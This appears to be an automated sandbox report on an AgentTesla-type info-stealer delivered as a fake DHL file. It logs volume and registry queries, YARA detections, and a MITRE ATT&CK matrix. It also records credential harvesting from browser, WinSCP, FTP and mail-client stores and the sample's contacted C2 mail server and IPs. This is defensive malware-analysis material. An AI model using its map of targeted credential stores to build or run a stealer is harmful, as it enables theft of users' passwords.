                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeQueries volume information: C:\Users\user\AppData\Roaming\uvbIwIYe.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b83228.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.478a620.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b47a08.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b47a08.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3853312298.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1534737744.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3853312298.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3853312298.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL_231437894819.bat.exe PID: 7972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7048, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: uvbIwIYe.exe PID: 7856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2788, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b83228.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.478a620.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b47a08.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b47a08.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL_231437894819.bat.exe PID: 7972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7048, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: uvbIwIYe.exe PID: 7856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2788, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b83228.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.478a620.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b47a08.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b47a08.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3853312298.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1534737744.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3853312298.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3853312298.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL_231437894819.bat.exe PID: 7972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7048, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: uvbIwIYe.exe PID: 7856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2788, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		311
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job                      		2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		621
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model1
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets251
                      Virtualization/Sandbox Evasion                      		SSHKeylogging23
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items251
                      Virtualization/Sandbox Evasion                      		DCSync1
                      System Network Configuration Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578149 Sample: DHL_231437894819.bat.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 54 mail.keeptraveling-eg.com 2->54 56 ip-api.com 2->56 58 api.ipify.org 2->58 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 11 other signatures 2->66 8 DHL_231437894819.bat.exe 7 2->8         started        12 uvbIwIYe.exe 5 2->12         started        signatures3 process4 file5 40 C:\Users\user\AppData\Roaming\uvbIwIYe.exe, PE32 8->40 dropped 42 C:\Users\...\uvbIwIYe.exe:Zone.Identifier, ASCII 8->42 dropped 44 C:\Users\user\AppData\Local\...\tmp1E51.tmp, XML 8->44 dropped 46 C:\Users\...\DHL_231437894819.bat.exe.log, ASCII 8->46 dropped 68 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->68 70 Uses schtasks.exe or at.exe to add and modify task schedules 8->70 72 Writes to foreign memory regions 8->72 78 3 other signatures 8->78 14 RegSvcs.exe 8->14         started        17 RegSvcs.exe 15 2 8->17         started        20 powershell.exe 23 8->20         started        28 2 other processes 8->28 74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 22 RegSvcs.exe 12->22         started        24 schtasks.exe 12->24         started        26 RegSvcs.exe 12->26         started        signatures6 process7 dnsIp8 80 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->80 82 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->82 84 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 14->84 48 mail.keeptraveling-eg.com 162.241.224.14, 49713, 49718, 587 UNIFIEDLAYER-AS-1US United States 17->48 50 ip-api.com 208.95.112.1, 49712, 49716, 80 TUT-ASUS United States 17->50 52 api.ipify.org 104.26.13.205, 443, 49711, 49714 CLOUDFLARENETUS United States 17->52 86 Loading BitLocker PowerShell Module 20->86 30 conhost.exe 20->30         started        32 WmiPrvSE.exe 20->32         started        88 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->88 90 Tries to steal Mail credentials (via file / registry access) 22->90 92 Tries to harvest and steal ftp login credentials 22->92 94 Tries to harvest and steal browser information (history, passwords, etc) 22->94 34 conhost.exe 24->34         started        36 conhost.exe 28->36         started        38 conhost.exe 28->38         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      DHL_231437894819.bat.exe65%VirustotalBrowse
                      DHL_231437894819.bat.exe71%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                      DHL_231437894819.bat.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\uvbIwIYe.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\uvbIwIYe.exe71%ReversingLabsByteCode-MSIL.Backdoor.FormBook

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://mail.keeptraveling-eg.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.keeptraveling-eg.com
                      		162.241.224.14
                      		truetrue
                        		unknown
                        api.ipify.org
                        		104.26.13.205
                        		truefalse
                          		high
                          ip-api.com
                          		208.95.112.1
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                              		high
                              http://ip-api.com/line/?fields=hostingfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://api.ipify.orgDHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://account.dyn.com/DHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.ipify.org/tRegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.microsoftRegSvcs.exe, 0000000A.00000002.1539589797.0000000006036000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
